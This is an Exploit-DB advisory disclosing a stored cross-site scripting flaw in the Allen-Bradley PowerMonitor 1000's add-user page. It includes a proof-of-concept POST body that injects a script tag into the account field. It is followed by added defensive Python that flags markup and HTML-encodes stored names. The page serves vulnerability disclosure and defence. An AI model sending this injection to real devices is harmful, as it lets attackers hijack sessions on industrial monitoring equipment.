Rockwell Automation Allen-Bradley PowerMonitor 1000 – Cross-Site Scripting

  • Author: Luca.Chiou
    Date: 2018-12-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45928/
  • # Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting
    # Date: 2018-11-27
    # Exploit Author: Luca.Chiou
    # Vendor Homepage: https://www.rockwellautomation.com/
    # Version: 1408-EM3A-ENT B
    # Tested on: It is a proprietary device: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
    # CVE : N/A
    
    # 1. Description:
    # In the Rockwell Automation Allen-Bradley PowerMonitor 1000 web interface,
    # a user can add a new user by accessing /Security/Security.shtm.
    # When a user is added, the new user's account is sent in the POST data.
    # An attacker can inject malicious XSS code into the account parameter of the POST data.
    # The account parameter is stored in the database, which results in a stored XSS vulnerability.
    
    # 2. Proof of Concept:
    # Browse to http://<Your Modem IP>/Security/Security.shtm
    # On the Security.shtm page, add a new user
    # Send this POST data:
    
    /Security/cgi-bin/security|0|0|<script>alert(123)</script>
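
For defenders, the following added example (not part of the original advisory and not vendor code) shows how a reverse proxy or log-review script could parse the pipe-delimited body shown above, flag markup in the account field, and HTML-encode the stored value before it is rendered. It assumes the fourth field is the account name, as the PoC suggests; the meaning of the two `0` fields, the allow-list pattern and all function names are hypothetical.

```python
import html
import re

# Assumption: account names fit a conservative allow-list (not the vendor's rule).
ACCOUNT_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
# Characters (raw or URL-encoded angle brackets) that enable markup injection.
MARKUP_RE = re.compile(r"[<>\"'&]|%3c|%3e", re.IGNORECASE)

def parse_security_post(body):
    """Split the body into (endpoint, opaque fields, account)."""
    # maxsplit=3 keeps any extra '|' inside the account field for inspection.
    parts = body.strip().split("|", 3)
    if len(parts) != 4:
        raise ValueError("unexpected field count")
    endpoint, f1, f2, account = parts
    return endpoint, (f1, f2), account

def check_account(account):
    """Return a list of findings; an empty list means the value is acceptable."""
    findings = []
    if MARKUP_RE.search(account):
        findings.append("markup-characters")
    if not ACCOUNT_RE.fullmatch(account):
        findings.append("not-in-allow-list")
    return findings

def render_user_row(account):
    """Output-encode the stored value so it is displayed as text, never parsed as HTML."""
    return "<tr><td>{}</td></tr>".format(html.escape(account, quote=True))

def triage(bodies):
    """Check each captured request body and return (value, findings) pairs."""
    results = []
    for body in bodies:
        try:
            _, _, account = parse_security_post(body)
        except ValueError:
            results.append((body, ["malformed"]))
            continue
        results.append((account, check_account(account)))
    return results

# Constructed sample bodies; the second is the PoC body from this page.
SAMPLES = [
    "/Security/cgi-bin/security|0|0|operator1",
    "/Security/cgi-bin/security|0|0|<script>alert(123)</script>",
    "/Security/cgi-bin/security|0|0",
]

if __name__ == "__main__":
    for value, findings in triage(SAMPLES):
        print(repr(value), findings or "ok")
```

Input validation at the add-user request and output encoding at render time are complementary: encoding alone neutralises values already stored, while validation keeps new ones out.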